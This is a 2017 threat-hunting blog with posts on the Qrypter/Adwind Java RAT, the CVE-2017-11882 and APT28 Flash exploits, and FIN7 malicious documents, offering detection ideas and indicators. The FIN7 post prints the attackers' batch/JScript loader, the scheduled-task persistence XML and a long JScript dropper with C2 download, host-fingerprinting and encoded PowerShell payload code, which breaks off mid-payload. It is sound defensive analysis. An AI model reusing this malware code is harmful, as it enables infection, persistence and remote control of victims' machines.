Wednesday, December 27, 2017

Qrypter Java RAT using Tor

Since the 16th of December, almost in a daily basis, I'm seeing a particular family of Java Remote Access using Tor. 



The samples I took a look are rarely detected by AV




The malware communicates via a Tor proxy with the malware developers website https://vvrhhhnaijyj6s2m.onion.top/


Qrypter seems the name of the product, which is developed by a company named 
"QUAverse Research & Development 2017"

One of the feature, according to the developers is its low rating detection. And indeed this is true :)


There is some recent information about "Qrypter" in Twitter from a researcher https://twitter.com/rcherj/status/940252259363016704 and a post from another company, Certego (http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/)

  




That information links Qrypter to Qarallax / Quaverse RAT. Quaverse, is actually the company who is behind QRypter. According to Malpedia, QRat / QRallax RAT have been in the wild since 2015



There is some information about this QRat/Qarallax/Quaverse in several presentations and posts:



In some other Tweets, some analyst links he same behaviour of Qrypter and Adwind JRat





Actually, doing the analysis of the malware I can see similar behaviour like Adwind. 
(I wrote a bit about how to detect Adwind in here)

¨



The samples I took are heavily obfuscated with several layers of embedded JAR files which reminds to the analysis done by malwarebytes and in this post 

Actually, after some analysis of the files I ended up with the same MANIFEST.MF pointing to a Main-Class operationl.JRat which matches Adwind.



And with a bit of further analysis, I end up with the same kind of configuration used by Adwind.




So in essence, this Qrypter looks like Adwind with some additional encryption layers.

By the way, another good analysis of this Adwind malware can be found in this post 


Let's continue taking a look to the specific campaign seen since the 16th of December.

The first sample I detected, which can be found here https://www.virustotal.com/#/file/7e33381a99928f7b346dd613e5712923b6816d1da69b43cf4f12c2d313ed2903/detection already used the domain vvrhhhnaijyj6s2m.onion.top 





The last one the last one detected, at the time of this writing https://www.virustotal.com/#/file/b68eb3096328fa3bfabbeb7a178ea7075539e15ef19fbc65ab3e89f980c60967/detection also used the same domain.



According to PassiveTotal that domain has been active since the 30th of November 2017



The first malicious samples under that domain existed from the 5th of December




But this was not the only domain used by Qrypter, but some other onion domains existed

https://vvrhhhnaijyj6s2m.onion.rip/ - active since 1st of December 2017
https://vvrhhhnaijyj6s2m.onion.to/ - active since 11 of September 2017

And there are some other which looks very fresh:

https://buzw55o32jgyznev.onion.link

https://buzw55o32jgyznev.onion.to/


Qrypter uses a tool to control the plugins installed: Qcontroller. This tool also uses Tor to connect to the he developers website.









Several plugins can be used:








QRypter product seems like the evolution or another version of Qarallax/Quaverse.  Besides the obfuscation and the connection via Tor with the developers website, to install additional plugins, there is not much of innovation on this Java RAT.













Monday, November 20, 2017

Hunting for Microsoft Equation Vulnerability - CVE-2017-11882

Since Microsoft released November patches last week where CVE-2017-11882 was addressed, I've been trying to get a sample in order to perform some checks for the vulnerability. Today thanks to Corsin Camichel I got the PoC

There is some information about this PoC in this blog post

At the moment the detection rate of the malicious files used in this analysis is really low.




Office doesn't spawn any unusual process while exploiting this vulnerability, hence a Use Case which monitors unusual processes spawned by Office will no detect the exploitation of this issue.

However, in this case, we need to pay attention to the the equation tool process "EQNEDT32.EXE". This process is the one who spawns other processes, hence monitoring those child process will detect any potential exploitation.
A basic Use case to detect is below.






Time for monitor your EQNEDT32.EXE processes :)



Sunday, November 19, 2017

Detecting Adwind malware weaponized in MS office documents

In a daily basis I see lot of Adwind malware trying to infect end users

Adwind is a multiplatform Remote Access Trojan (RAT) which has been in the wild for some time. In this Kasperky Blog post there is a good historical analysis.

In most of the cases Adwind is delivered as an attachment via email (as ZIP or JAR file), but it is not the only way.  I've dealt with incidents involving Adwind where the infection vector was a malicious link.

Other potential infection vector is via weaponized MS office documents. Some of this weaponized document have really low detection rate, like the one above, which it is only detected by 20% of the Antivirus at the moment of this writing and 8 AV (from of a total of 60) when the file was originally reported

 






The malicious payload, a JAR file, is included in the MS office Document as an OLE object.







This can be seen doing some manual analysis on the file:





A Simple Use Case to detect the malware is to monitor any process spawned by MS Office, in this case it is a Java Process



In terms of persistence, the malware can be detected easily, as it creates an entry in the registry "HKCU\Software\Microsoft\Windows\CurrentVersion\Run " pointing to a java executable which it is allocated in the the AppData directory of the user:




This can be easily hunt with a remote PowerShell query, like the one below




Adwind malware kills massively processes relates to Antivirus and monitor tools, which can be also a good indicator for detection



To avoid those processes to be executed again the malware uses an interesting trick. It includes the processes in the registry key as 'debugger=svchost.exe' using the "Image File execution Option". This technique is described in this blog post







This can be spotted straight forward with a query, checking any registry imported from the AppData user folder, like the one above:



Another way is to monitor all the registry keys being set with debugger




IOC:

185.172.25.13
245addb0e7b0d9f63e8a63efb8c77ffdc4e39cb2ddbbe8a138f3203e7458caf5


Saturday, October 21, 2017

Hunting APT28 CVE-2017-11292 Flash Vulnerability

Proofpoint made public a couple of days ago that APT28 is using the last flash 0-day CVE-2017-11292 via some malicious weaponized DOC files; APT28 racing to exploit CVE-2017-11292 Flash vulnerability before patches are deployed

So far I have not seen this vulnerability abused by common malware but I guess is a matter of time that cyber criminals starts using it. 

At the moment in VT there are only 2 files with the tag CVE-2017-11292 . 


The second one is basically the Flash embedded into the first one.




In order to create a Use Case to detect it, first of all I check which processes are
spawned by Microsoft Word, but unfortunately there is no single processes spawned.
Although, I see there is some communication performed to a domain blackpartshare.com




This means that Microsoft Word is doing the connection to Internet, and I can hunt for that:


Seeing the amount of malware abusing Microsoft Word documents, it is  a must to closely monitor any anormal activity coming from Microsoft Office as I have discussed in this blog, like for example, commands spawned, connections done, etc.

The domain accessed in this case is  the domain reported in proofpoint blog post which has been registered a couple of days ago.


Again, this might be a good indicator.

if you can get a whitelist of domains which are most frequently accessed in your environment and combined with top Alexa 500, you might create a Use Case to monitor the registration date of the domains which might be a good indicator. I wrote a Use Case to detect this kind of behaviour in Exploit Kits some time ago; Hunting Exploit Kits Abusing Domain Generator Algorithm. There might be other ways to do it, via for example Passive DNS or similar, but in the end the the target is the same.

Coming back to the behaviour of this malicious DOC file, one of the things I see is that it loads some Image in order to open the flash embedded via an ActiveX in the document. 



It is possible to spot this behaviour while monitoring what Image are loaded by Microsoft Word


Monitoring all the Image Loaded by a process like Microsoft Office can generated lot of noise, that is why it is important to narrow with appropriate filters. 
Things like Flash, with historically many vulnerabilities being exploited, is something you might consider to monitor closely.

Now it is possible to combined two use cases: the connections established by Microsoft word and the Flash image loaded in order to create a more advance Use Case. This is done with one sub-search using the process_id.

I search for any MS Office process which loads flash and then performs a connections to Internet.




There might be other approaches, like monitoring registry keys related to Flash and office, and connections, but I find this process quite simple and working.

Again, it is important to keep a close eye in any Microsoft Office process and the connections established, as this might be good indicators :)



Sunday, October 15, 2017

Hunting FIN7 malicious documents

A few days ago I read an interesting post about some new technique that FIN7 Threat Actors are using to deliver malicious payloads in RTF and DOC files. The ratio of detection was in the best case only 1/59



Although at the moment of writing this post the detection is much higher.


In any case, this is an interesting case to take a look.

Both files, the DOC and RTF, contains an OLE object which it is a CMD file. 



The CMD file is a batch file which contains a set of windows commands.


This means that a cmd.exe command will be spawned in order to executed the commands in the file.

A first use case to detect this malicious behaviour is to monitor all the child processes spawned by any Office program. This is the same approach explained in other posts in this blog.




The CMD (unlock.cmd) is the following 


@set w=wsc@ript /b /e:js@cript %HOMEPATH%\tt.txt
@echo try{var fs=new ActiveXObject('Scripting.FileSystemObject');sh=new ActiveXObject('Wscript.Shell');p=sh.ExpandEnvironmentStrings('%%HOM'+'EPATH%%')+'\\pp.txt';var f=fs.OpenTextFile(p,1,false);for(i=0;i^<4;i++)f.SkipLine();var com='';while(!f.AtEndOfStream)com+=f.ReadLine().substr(1);f.Close();try{fs.DeleteFile(p, true);}catch(e){}this[String.fromCharCode(101)+'v'+'al'](com);}catch(e){}; >%HOMEPATH%\tt.txt
@copy /y %TMP%\unlock.cmd %HOMEPATH%\pp.txt
@echo %w:@=%|cmd
#function b64dec(data){
# var cdo = new ActiveXObject("CDO.Message");
# var bp = cdo.BodyPart;
# bp.ContentTransferEncoding = "base64";
# bp.Charset = "windows-1251";
# var st = bp.GetEncodedContentStream();
# st.WriteText(data);
# st.Flush();
# st = bp.GetDecodedContentStream();
# st.Charset = "utf-8";
# return st.ReadText;
#}
#var fso = new ActiveXObject("Scripting.FileSystemObject");
#var sh = new ActiveXObject("Wscript.Shell");
#var fldr = sh.ExpandEnvironmentStrings("%HOMEPATH%");
#var p = "";
#p = fldr + "\\whatis.ini";
#if(!fso.FileExists(p)){
# var f = fso.OpenTextFile(p,2,1);
# f.Write( b64dec('ZnVu......
# f.Close();   
#}
#cmd = 'wscript.exe //b //e:jscript "' + p + '"';
#sh.Run(cmd, 0, false);
#fso.DeleteFile(WScript.ScriptFullName, true);
#function Abracadabra(){
# try{
#  var objWord=GetObject("","Word.Application");
#  objWord.Visible = true;
#  objWord.ScreenUpdating = false;
#  var objDoc = objWord.ActiveDocument;
#  objDoc.Content.Select();
#  objWord.Selection.Delete();
#  var objRange = objDoc.Range();
#  objRange.InsertAfter("ȪȪɃɅɄwɁȦɍɧɬɶɵɗɀȄ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("Ȫ ɃɅɄɁȦɍɧ ɬɶɵɗɀȄ ȪȧȀɥȦȿɃɚɚɏwɳɨɁǿȨ ȭȰșșɐɩɘɂɂȕȗȘȱəȓɏɾءاةیییڱڱۉ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("Ȗ ɤɤɢɩ ɕȧɵʋʒɛȚȃȃǾȺȻɄɜwɯȓ ɓɻɘȜȾɒȻɓə ɤɤʂɦɑɑɂȩɶ ʶʂɖɑɤɄɅɄǽȹɥɿɅȮȤɵʷȭɂʐʉʉ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ȩɄɄɤȯȮǾɐʥ ʥʥɋɏɏȰȦɬɫwɒɯɚȩȩɈɓȨɃɃ Ȫɏɏɴɴɗȫȧȯ ȯȯȑȑȕȗțȝȝɦɤɍȹȦȫ Ȯɭʁʀɸɷ ɣȾɗə əəɒɐȸ ȺȚʥ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ʣɸɗʄɻʎʡʠʠʐʐʔʖɫɓɑɣəȹɴwʏȽɞɞ ȻɄɜɯȓɓɻɘȜȾɒ ɑɂȩɶʶʂɖɑɤɄɅɄǽȹɥɿɅȮȤɵ ɃɅɄɁȦɍɧɬɶɵɗɀȄ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ưnjƠƞưƤƊƌ ƛ ƳƴƤƊ ƥwƥƥţƠƠƵ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ŸƌƌƉȮɐɐwɕɖɔɔȾȨʞʞɐʁ");
#  objRange.InsertParagraphAfter();  
#  objRange.InsertAfter("ɂȩɶʶʂɖwɑ Ʉǽȹ");
#  objRange.InsertParagraphAfter();  
#  objWord.ScreenUpdating = true; 
# } catch(e) { }  
#}
#Abracadabra();

Without going into the details of the execution flow, in essence the CMD, while executing the code, generates and executes an obfuscated file, which it is reality a JS file, and this same process is repeated several times in a loop. Several files with different extension are created (.INI, CHM and TXT,) however all of them are executed with the command "wscript" as showed below:







On important thing that happens is that there is a delay of 100s before to execute the second script in order to by-pass sanboxes and AV.

At some stage there is a schedule task created base on an XML.



<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
 <Triggers>
   <TimeTrigger>
     <Repetition>
       <Interval>PT47M</Interval>
       <StopAtDurationEnd>false</StopAtDurationEnd>
     </Repetition>
     <StartBoundary>2017-05-22T20:21:00</StartBoundary>
     <Enabled>true</Enabled>
   </TimeTrigger>
 </Triggers>
 <Settings>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <AllowHardTerminate>true</AllowHardTerminate>
   <StartWhenAvailable>false</StartWhenAvailable>
   <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
   <IdleSettings>
     <Duration>PT10M</Duration>
     <WaitTimeout>PT1H</WaitTimeout>
     <StopOnIdleEnd>true</StopOnIdleEnd>
     <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <AllowStartOnDemand>true</AllowStartOnDemand>
   <Enabled>true</Enabled>
   <Hidden>false</Hidden>
   <RunOnlyIfIdle>false</RunOnlyIfIdle>
   <WakeToRun>false</WakeToRun>
   <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
   <Priority>7</Priority>
 </Settings>
 <Actions Context="Author">
   <Exec>
     <Command>wscript.exe</Command>
     <Arguments>//b /e:jscript \Users\user1\{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}\59d76612d0ba68.06041356.txt</Arguments>
   </Exec>
 </Actions>
</Task>


So now we know how the persistence is achieve: via a schedule task which executes the command:

wscript.exe /b /e:jscript \Users\user1\{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}\59d76612d0ba68.06041356.txt

The directory "Users\user1\{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}" is used to store all the temporal files created and executed via the initial CMD command.

The schedule task can be seen via the windows GUI





At some point, there is some commands to map the system




The WScript runs every minute, so it is a good indicator also to check




There is a moment in which one of the scripts spawns a PowerShell command




The script basically acts as a dropper using powershell.

function readFile(p)
{
 try{ 
  var fs = new ActiveXObject("Scripting.FileSystemObject");
  var file = fs.GetFile(p);
  var stream = file.OpenAsTextStream(1, 0);
  var content = stream.ReadAll();
  stream.Close();
  return content;
 }catch(e){
  return "";
 } 
}
function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;
    do{ 
  curDate = new Date();
  WScript.Sleep(100); 
 }while(curDate-date < millis);
}

function getProxy(){
 var WshShell = new ActiveXObject("WScript.Shell");
 
 try {
  var ProxyEnable = WshShell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable");
  if(ProxyEnable == 1){
   var ProxyServer = WshShell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer");
   return ProxyServer;
  }else{
   return "";
  }
 } catch (e) {
  return "";
 }   
}

function downLoadUrl(metod,urlArr,url,val){
 for(var i=0; i<urlArr.length; i++) { 
  try {
   var xmlServerHttp = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");  
   xmlServerHttp.open(metod, urlArr[i] + url, false);
   var prox = getProxy();
   if( prox != ""){
    xmlServerHttp.setProxy(2, prox, "");
   }    
   xmlServerHttp.setOption(2, 13056);
   //xmlServerHttp.setTimeouts(0, 0, 0, 0);
   xmlServerHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
   xmlServerHttp.setRequestHeader("Charset","utf-8");
   xmlServerHttp.setRequestHeader("Connection","Keep-Alive");
   xmlServerHttp.setRequestHeader("Keep-Alive","300");  
   xmlServerHttp.send(val);
   while (xmlServerHttp.readyState != 4) {
      xmlServerHttp.waitForResponse(1000);
   }
   if(xmlServerHttp.status == 200) {
    return xmlServerHttp.responseText;
   }  
  }catch(e){}
 }
 return ""; 
}

function b64enc(data){
 var cdo = new ActiveXObject("CDO.Message");
 var bp = cdo.BodyPart;
 bp.Charset = "utf-8";
 bp.ContentTransferEncoding = "base64";
 var st = bp.GetDecodedContentStream();
 st.WriteText(data);
 st.Flush();
 st = bp.GetEncodedContentStream();
 var result = st.ReadText(st.Size - 2);
 return result.replace(/\r\n/g, '');
}
function b64dec(data){
 var cdo = new ActiveXObject("CDO.Message");
 var bp = cdo.BodyPart;
 bp.ContentTransferEncoding = "base64";
 bp.Charset = "windows-1251";
 var st = bp.GetEncodedContentStream();
 st.WriteText(data);
 st.Flush();
 st = bp.GetDecodedContentStream();
 st.Charset = "utf-8";
 return st.ReadText;
}

function cuid(){
 var rmac = "1";
 try {
  var oWmiService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
  var cItems = oWmiService.ExecQuery("Select * from Win32_NetworkAdapter where physicaladapter=true");
  var oItem = new Enumerator(cItems);
  for (;!oItem.atEnd();oItem.moveNext()) {
   var mac = oItem.item().MACAddress;
   if(mac != null && typeof mac == "string"){
    rmac = mac;  
   }
  }
  rmac = rmac.replace(/[^A-Za-z0-9]/g, '');
 } catch (e) {} 
 var sn = "2";
 try {
  var FSO = new ActiveXObject("Scripting.FileSystemObject"); 
  var strDrive = FSO.GetDriveName(FSO.GetSpecialFolder(0));
  var D = FSO.GetDrive(strDrive);
  sn = D.SerialNumber;
 } catch (e) {}
 sn = b64enc(sn.toString());
 sn = sn.replace(/[^\w]+/g, "").slice(0, 20);
 rmac = rmac.slice(0, 20);
 return sn+rmac;
}

function getRandomInt(min, max) {
  return Math.floor(Math.random() * (max - min)) + min;
}
function randomString(length, chars) {
    var mask = '';
    if (chars.indexOf('a') > -1) mask += 'abcdefghijklmnopqrstuvwxyz';
    if (chars.indexOf('A') > -1) mask += 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    if (chars.indexOf('#') > -1) mask += '0123456789';
    if (chars.indexOf('!') > -1) mask += '~`!@#$%^&*()_+-={}[]:";\'<>?,./|\\';
    var result = '';
    for (var i = length; i > 0; --i) result += mask.charAt(Math.floor(Math.random() * mask.length));
    return result;
}
function randomParamName(){
    result = randomString(getRandomInt(1,3), 'aA') + randomString(getRandomInt(1,8), 'aA#');
    return result;
}
function randomParamData(){
    result = randomString(getRandomInt(1,12), 'aA#');
    return result;
}
function randomUrl(str){
 var result = "";
 var parArray = [];
 parArray.push({ name: randomParamName(), data: encodeURI(SimpleEncrypt(str)) });
 parArray.push({ name: randomParamName(), data: encodeURI(b64enc(kkid)) });
 for (var i = getRandomInt(0,5); i > 0; --i){
  parArray.push({ name: randomParamName(), data: randomParamData() });
 }
 parArray.sort(function(a, b){return 0.5 - Math.random()});
 
 for (var i = 0; i < parArray.length; i++) {
  result += parArray[i].name + "=" + parArray[i].data + "&";
 } 
 return "?" + result.replace(/&+$/,'');
}

function SimpleEncrypt(a){
 var str = b64enc(a);
 var chrArr = str.split('');
 var pos = -1;
 var resultArray = [];
 for (var i = 0; i < chrArr.length; i++) {
  pos = alfIn.indexOf(chrArr[i]);
  if( pos != -1 ){
   resultArray.push( alfOut.charAt(pos) );
  }else{
   resultArray.push( chrArr[i] );
  }
 }
 return resultArray.join("");
}
function SimpleDencrypt(a){
 var str = a;
 var chrArr = str.split('');
 var pos = -1;
 var resultArray = [];
 for (var i = 0; i < chrArr.length; i++) {
  pos = alfOut.indexOf(chrArr[i]);
  if( pos != -1 ){
   resultArray.push( alfIn.charAt(pos) );
  }else{
   resultArray.push( chrArr[i] );
  }
 }
 return b64dec(resultArray.join(""));
}


var evalString = (function () {/*
try{
 var fso = new ActiveXObject("Scripting.FileSystemObject");
 var sh = new ActiveXObject("Wscript.Shell");
 var jsLoaderDir = "{2DF6ACDA-8FF7-8208-77F5-8581F0D479E9}"; 
 var PS1Body = "JEVuY29kZWRDb21wcmVzc2VkRmlsZSA9IEAnCjdMMXJkK0pLc2liOHZYOEY3OTQxVTNablZRVzZvRXVmdGRkN3VOOUJCaGtFZTJyVlNFZ0pBaUZBU01tbHovN3ZFd0pqQThaVnh1WGUzV2VtYTlXeURVaVJrWEY5SWpKVEZDSi9FTG96UDJITWdzd21kTkpCOEplLy95V0IvelF6TUtlN3YyNTJQK04vdisvZWRFSW51TkZtUzNkMzQyK0o1S2RFM2ZSdE01d0ZHM3o1UVE4aTUvWnI0dmVZM3U5ZnZ5WStQQkQrOUFNNjNIZm9JQlhrc09wc2RqUnVkei9wTExqNTRQNlcvSS9FQnpmeDJRc2ZCL3BTYy94aE9FckVIeEN5di9qdmo0TWZydnI5Zy9zMUh1YjQ1V2RyUFF0T2h2cGo5ek53d2lqd0g2Lzl5eDkvS1J3RWx6R1hqaVRtbk1ITWRvNGxlQzYvbjVQZDBiUWZlUG05dlZtR3p2UkxkdVl6SndpLy91MXZoV0EyM1hPVEhaa0IzbVJ1Ymg1bEg0OTBKcDlibk1hdmEwbE1JQU9KdFNJbFhEOHg4NTBFUFV6dFpqQ2F1UU1uNFM0VFU5TjJFdEU4WVNGOUc2OUt6R2NySjFpT0hNOUx6SVBad0ZrdUU1WWIrdmo3OWtrMmVyREpldzRydDNMbFk2dDZrMFNXWWVENlE1U0k3WG4zZ2ZjTkdmNzBIVEl2R2RNek1wTDRQVEw4ajhqRXdtcmdmZDhqSXB3UktaamVjazlsRUxqejBQSm1nMG5Na1RPSUpmYzlTdUpMbE14WTIzc2F1eHVYUndiemE3YlphT3ZwaHQ3ZXZmeFFTcmRMMzZyNVhpd2xZZjlXcHRuVTIzb3JyWDJycDQxdnRYeWpxSmZpajNsbC83bGVhdVhUdVcvZGRGbi9wcGZyK1hoU3FjUmZFMXd5bWR4ZmtTMlZhN2x2V3F1Wi9hWTN2MVhMdFJwZTgzRVEwdW5NLzdpL0pKZlAzQmNmdWQ2ekZrOTR6K3VIcnVzTC9PNDFYdE53VnArYjF0Z1poSWtITzkrLzJ0KzErL2xvWlVVbi9MeTdXZC9NbmVXNXR6OTk4ajJ5VDlmblpsUFRqV1g5ZTNvKzM3OUEzOHBHUWVENDRmNzEwY1ViMzV5NmcvUnk2VXd0YjNOeGhKWkRQV2ZINlpmRGRiSEIzSHc4dS9uajdSUGR3M3VaeVBWc0o0aUZ0aC82Uzg2aHJ1K2MzWHB6enNpbngvQndOSHArNm9aZnppaW5CN0hyNGdSYmtYODBmbjFtUjU1ek5QclpiYWRzN0s5K25ORCs1VWVNTjNSbm5rOWtNVmFoNDBRRE5OK3lUMmV4a0E5c1JuN29UcDB2WlI4dGZqWnZPd0hEeUxQOFVqY3h5SmhlZXBrTzBlT3NDRFBCRjlUM0VhSGx6ZTN2eWE5UEN2ejE2Ri84T3QrNHI1Ky8vM1J4M28rbTZGSkRkeENieUJPbjhhdWo2Wi9JNDJIeThhMDNIeC92eGZsKzFDTExjd2Y0MSsvM09CRk8rbnA3a2VJRGdacUxjelc5bTQvbGVycVkvOWJRdnpVMXZkeHNwR3ZmU3JtV3dLTXZGc3ZaSTJxSjVKcExXcmVKLzBvMG8vQnpJL0s4dDVPWHhFdmsrWmZJUDA1ekZ3U1B4c29HamhrNjhUczN0eGVkN3I4U2FkditYRWZyUVZFKy9ONFJhc3hDUjBOZFkvTGFKRDdITHZHa2lNVG5qdWxGenRHNEZ4VWN2OFN3ZFovVnp6NTR1cmk5TTVQRVhnYTV0SjcrbGl1MzhsbTkyZW9kdWR2QnVPSVk4VEVkaGJPYXVabEY0YWRFMmwrNldjOWNMajhsSG43dGRmd3BrVi9QOGJjYkhxNXNPNmJuMko4U0dRZHhpVk53SGM4dSsyNzQ4U3FiMnNueDR5Vm1ZM2Q2WXZQSnYzZHlpbS83K2ltaFBHbmc1b0pCN0hpNitkaHhnekJDbDdMdEFGMy9vSCtCLy9wa3dMZTNYOXBPMktSMDZZUTN5WXNXOFowQjJ1N1crVEZaOGJLaFhacjdQOVRtTGc1NE1MK0xadk9DY1JYS3RmeTNFcWJKZk92bkxLdnRMQ0xNTmE3cC9jTnM2NGpYMXhnV24veHVJSHZRZTkwY2pQRFZVVVE1VXYwcmc5WURxVVlVcTZ4SjIvdlV0WHdQbWpybWx4emFUVHMwcC9QTDlua2RRVzNteHRsS243VTNVMnZtNmFibHZXRDNiNXo4anV3TEhub2R5ZGdsbTdRNWo0VnBlaVVIMFh6d0hqS05DdzF6Z0VKd2w2RTd1RVpOeit6d1QzRHk0OUZPUGZ6WWQxOXc3NmZrdWJ0TUV2L0YwOGN6ZmwvbDZHTHlWVGxrbDVaamdvLzUrYjJTUjkwY3o0S2E2MCtjb0lNRkp0cHJiRlM3RnNBTFEvQlhEK0g2Vnc0aHZDVUZObWwyWnI4NUVmNlFlR3dkbUNMd2J4dWptdm5qY1pTM2pYUHZ1OWVPeEYydGtnY3cwcVI1UHd3MnU4RDZpbUdrYTRlSnV5T3ZWUXQvdGVtV3ArYlFpWWM0RUpmRUY0bGZyL1I5Smt4Nzd0Q2ZPcThSajNDMUZncXU1MXd6d05YeTN6bDNFd096R2JyK2NCOS9qbHp3ZWVvNDhaUHJZMG5zNkc4ZTd2cTRFczl1WndTdkgrUnFPOWpONmNwQjNxYW5kbVF0cnhUWjFTRm1ONXZyQjBwZGJRbzczUEJBZjVmd2ZtemVxYXNONENFd3g4cDVCZm1ydGJJbnZ3ZHZyNmpicEt1RmxCMDVnMGs3bXI2QzlodVRGbUx2d2FUbExKMkF2U0pLeW0vVXdHNlU3R3c2ZGNNZkQ2SzhxYjdkNldIKzZwa29iMHkrOFNDdm5ZaDZ0VUhWWnJFcEZUeHorQXB6NHBKWDYveFF5TFNZbWZidGVFYXZHdWRxV1NHV25nWGhvZjY2V0xTL05OajFVS1U4ZmZOZzEwTUtOTEJaRkF5Y3R3MzNCa0VPbkYyTitLYnhyc2NEV1N6UlhPb080a0x2TFNOZW56NWplTlp5dkJrTytkWnBYcDhYY280VkRhOGQ1dnJ3blE0R0l6ZEVuQmdGVjA5S3V0cFdpdDdNTWowdERLNGRTcjdhVFBSYSswMmFVcTQyanpnaVptYytkWWR2R2xDOTJqUXlzOGkzOXlIbHlzSDQ1UFVGU2xxL2VwQ3I3U0xuZU9abVA2T2NzMS9nbkYxckkvejFwVjIyMW5wWVEzcnNibDAxNHZVVjJVUHl0NjhkNllXNjdNTUxiWnMvb1MvMmZNelQ3dGp6MXRmcmVtUUMvOStyUnlid3IrcVJvYW44dTBmMjd4N1p2M3RrYitpUjdhbS9Ua1RYaCtSbkhianZFTDllMWYvdXdQMjdBL2Z2RHR5L08zRC8xM1hnWGg3bEhUdHczeG5rN1hvNDc4QjlKN1AvUkp2dnRSTjVXNzM1Nmc3YzlVM0VOelhncmk5aTM5NS91NzVuK1JQdHQrc2JtRC9WZnJzZTRmMWMrKzE2TVBhejdiZnJNZFE3dE4rdXh6eHZhcjlkand0K3B2MTJmYVo3Yy92dCtxVDAxdmJiOVQzRm4yeS9YWjlJM3Q1K2UwTno4ZnIyMnhzYWl1L1NmcnUrdGZpejdiZnIrNHh2YmIrOVVCRmZiblVKL0ovZmZzTXh2OXQrRS9pWDJtOE4vZUdTOXMvdVR2c1R0cUFlTS91cXRwc2t2bVlUYWh1TFovTWhCUC8wdHNtNEhEKzM1Nk90Z20rbSsyd2o1a3VOMXRmdG9qd1c1WjlncnlmRG5acnFpUVgrMEVwL3RqLzhwMXJwSzV2RG92TC9tcFVLL0xWVytxZEUxWlBoWHJMU2wyTnBydG4rNzdLWi80blYxMWpvNjhLbzgyMzZzSHp4MDN2RW5XOER5NXUvRTZYM29oTjQ3elczdVJtTTdIZlpUSTh5ZDlIZHNEcDZKMnJtK2gycExkL2xFQWJTZVM4VkxwL2FaRDlIeVgwM2p0Nkhqa2ZOZHpQUEdmTm5QNmIwUk1yNUZqakwzZDNuSWZxTWNPQWN6ZmIzcjArVVB5Vks1cDdDdzluTmo1Y1BnTzRqOG85UGdONzdVOU0zaDQ2OWkxOS8rMXRtZzNmdURyYy9rZDBOdDNzUENmN256UnNQbFI3MS9YWjhZdUZ3SHZ1Zm92SjN6L251VHRwbW8yVTRtejRPOFhEcnpma2gyRS9QcGZMcGVFYWY0Z250RVVKQ1BPYm9TVlZ4ZVhNMjJzMHB3N2QvZVoyMU9GUFhmaWZEUTFJNHU2dHRqMytsOGZIL090YjNMMkVhWFBLWmJmRHZheHdZbG54bkZZdjlkWGoxSEp6OEdhYzRud1k3TzhINWhPWmV3SHZ0ZkRaR3RmOWRNTjhwdTYvQmZmSEpycWZoZkJUYWp6MHRGbTJzOFBpWTM3KzlETDFNT1hheVJ4bStrNHM5SE14KytmajBkVEg0TmVlODMzS0t0R1d1WHQ2LzhjWVR0UDhRbW8vckRPOHkrVWU2Tlh6UDN5MnN2UXZkeHpXNjUreSt4d25xQzl6K0F3Nzh2am9kbk1hdFB5RWxuQTE0bWhiT2d2NExxU0Z2YU0yVy9sN1BqZmdUa3NNNXc2OU5ELzlJOWIrOHV2VGV4L0ozVzJlK3U1SGxTbnJ4RHBsM3BIZElxajg3ejVmM3ViMHRVaHllcC9TdVVTMmU3THNRZk56OStLNXNQbEo5Zno1amlzM0FqanM2MTRmSmN3LytFd0xsc3lGUFErV3pJUGc0N09IWmVHZVA0UHBqZjhYenAzVHR3SmJwaDVlZjFQWDQ2ZXVlMW5WMnoxVVBHOHJYdjJXYjlYcFpQMHcxdVU3aXY4ZG5tcjNIQUsxOE85L3E1RTlINE45ckJHMnZtWHoyWHM5L2k1L1ExbTJWOWFQQnhQZWJTQzUvTGl2eHZXWnh0R0t4bjBzNmczL3UzajJSRy8vZW8rVnF0YWNCM2swcGU3WFg4dW4yRWZ2S2UxRi9mQVJmOC81SUYxeVNmOEVoVDczdDNDbkx5OWduSmZIbS9DR1poNGRNWXREU3dnQkxzaVZpLzhSblo1RlFYdlJ1NUhUd0VQN09xQjAvOVRIK2Q5MlRIOXVIWnkzdWNjK25INUI1NmNtUGoyUmlQaDA3Q3A0ZTkzWmNudTBqemRFVC9WNStEbURjTkh5NDBIV1dOeGpRSDhuRS83b2pKM0FPQWV6dmlRL2Z2dXczN1J4b1o4M0JDR1dhOXUzNHM5b0Qrdi9Tbm50dWVQUHhmLzJ2ajdlL2YrYStmc2t2c0lwYll2VzFENEcyaDlYMncyTkpkd3pmKzB1VE9nMjhtVGwxSnh6TjdEaDJuczBqWm5VUEVldnVJSmd0WnpUOHNyT1BMeGR1UDY3bThiNjkyRXNvVTIvMytMY0xkOFRrOTMvZWZEeTc0NHpZa1pHOGp0YlJEY2VrcWs2QTNEOHhkVGJxbDdMUFpoTXN3MzNNcm5FRi8yQTh4L1Y3T0oyamJaL21tYjI5UDEyenA5Wnk2T1dPd3d2OWpNZTdiaDRHK1hUSzhPMHpYejJkNkRQdWY5UkFlUnp3N